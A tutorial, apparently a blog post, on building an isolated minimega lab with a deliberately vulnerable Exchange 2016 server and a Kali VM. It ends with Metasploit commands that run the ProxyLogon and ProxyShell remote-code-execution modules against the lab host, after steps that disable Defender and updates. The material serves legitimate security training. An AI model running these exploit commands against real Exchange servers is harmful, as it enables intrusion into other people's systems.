# Building a ProxyLogon and ProxyShell lab environment ProxyLogon and ProxyShell were recent vulnerabilites published by Orange Tsai on his blog: https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html He also gave a great talk at Defcon on the matter. https://www.youtube.com/watch?v=5mqid-7zp8k I'm going to walk you through building a lab environment using Minimega. Minimega is a vm management tool and you can learn more about from the [miniclass](http://ku.nz/miniclass/old.html). Using the class you will need to build a kali vm with an updated metasploit ``` apt update apt upgrade metasploit-framework ``` You will also need to build a vm of Windows 2016. You can get a trial iso from MS. https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2016 The 2016 exchange installer doesn't work with Windows 2019 so be sure to grab a copy of Windows 2016. After you have those two VMs, here are the commands I used to boot those vms in a lab environment using the windows image as a nameserver for test.com. This makes configuration really straight forward and when AD services are installed the domain test.com will function as expected. ``` shell echo launching minirouter clear vm config vm config filesystem /root/images/uminirouterfs/ vm config net experiment,net1 vm config preinit /root/images/uminirouterfs/preinit vm launch container r0 vm start r0 shell echo configuring routers router r0 interface 0 1.0.0.1/24 router r0 dhcp 1.0.0.1 range 1.0.0.2 1.0.0.254 router r0 dhcp 1.0.0.1 static 00:16:36:00:00:03 1.0.0.3 router r0 dhcp 1.0.0.1 static 00:16:36:00:00:04 1.0.0.4 router r0 upstream /test.com/1.0.0.3 router r0 commit clear vm config vm config memory 16384 vm config vcpus 4 vm config disk /root/images/server2016.qcow2 vm config snapshot false vm config net experiment,net1,00:16:36:00:00:03 vm launch kvm exchange vm config memory 4096 vm config vcpus 2 vm config net experiment,net1,00:16:36:00:00:04 vm config disk /root/images/kali.qcow2 vm config snapshot false vm launch kvm kali vm start all ``` ## Creating a Domain Controller with Users On Windows Server 2016: From Server Manager (Loaded at Boot) -> Dashboard -> Add Roles and Features -> Next -> Next -> Next -> Select Active Directory Domain Services -> Follow Prompts -> When finished click promote to DC -> Add a new forest -> domain: test.com -> netbios: test or you can do the same from powershell as admin ``` Install-WindowsFeature AD-Domain-Services -IncludeManagementTools Install-ADDSForest -DomainName "test.com" -DomainNetBiosName "test" -InstallDns:$true -NoRebootCompletion:$true restart-computer ``` once rebooted you will need to make an account which will be used to install exchange ``` net user da P@ssw0rd1 /add net localgroup administrators da /add net group "domain admins" da /add net group "enterprise admins" da /add net group "schema admins" da /add ``` You can also make normal user accounts for any emails you want ``` net user user1 P@ssw0rd1 /add net user user2 P@ssw0rd1 /add net user user3 P@ssw0rd1 /add ``` You may also like to disable Windows Defender and Windows Updates: gpedit -> Computer Configuration > Administrative Templates > Windows Components > Windows Defender -> Turn off Windows Defender -> Right click edit -> enable gpedit -> Computer Configuration > Administrative Templates > Windows Components > Windows Update -> Configure Automatic Updates -> Right click edit -> disable ## Installing Exchange 2016 on Server 2016 Download the cumulative update 17 for Exchange Server 2016 iso, which is available to anyone straight from MS. This can be used as an installer and installs a vulnerable version as part of the default configuration. https://www.microsoft.com/en-us/download/details.aspx?id=101448 The Exchange 2019 iso requires an MSDN subscription. Attach the iso to Windows 2016, then login as the da user and run the setup.exe. The installer will check for various pre reqs such as dotnet 4.8, ucma 4.0, and visual c++ 2013. - https://support.microsoft.com/en-us/topic/microsoft-net-framework-4-8-offline-installer-for-windows-9d23f658-3b97-68ab-d013-aa3c3e7495e0 - https://www.microsoft.com/en-us/download/details.aspx?id=34992 - https://www.microsoft.com/en-us/download/details.aspx?id=40784 You will need to download and install these manually. You can bridge networking following the advanced configuration minirouter module in the miniclass or you can create an iso with the dependencies and add the iso using mkisofs. You might find it helpful to disable IE Enhanced Security Configuration (which nags for permission to open every new website visited). Server Manager -> Local Server -> IE Enhanced Security Config On -> Disable for admins and users Once the pre reqs are installed restart the installer. Get a beverage as the process will take a few hours to do its thing. When completed you should be able to login from Kali at https://test.com/owa and be able to exploit it using the metasploit modules. ## Attacking with Metasploit ``` msfconsole use exploit/windows/http/exchange_proxylogon_rce set RHOSTS 1.0.0.3 set LHOST 1.0.0.4 set EMAIL da@test.com exploit exit use exploit/windows/http/exchange_proxyshell_rce set RHOSTS 1.0.0.3 set LHOST 1.0.0.4 exploit exit ```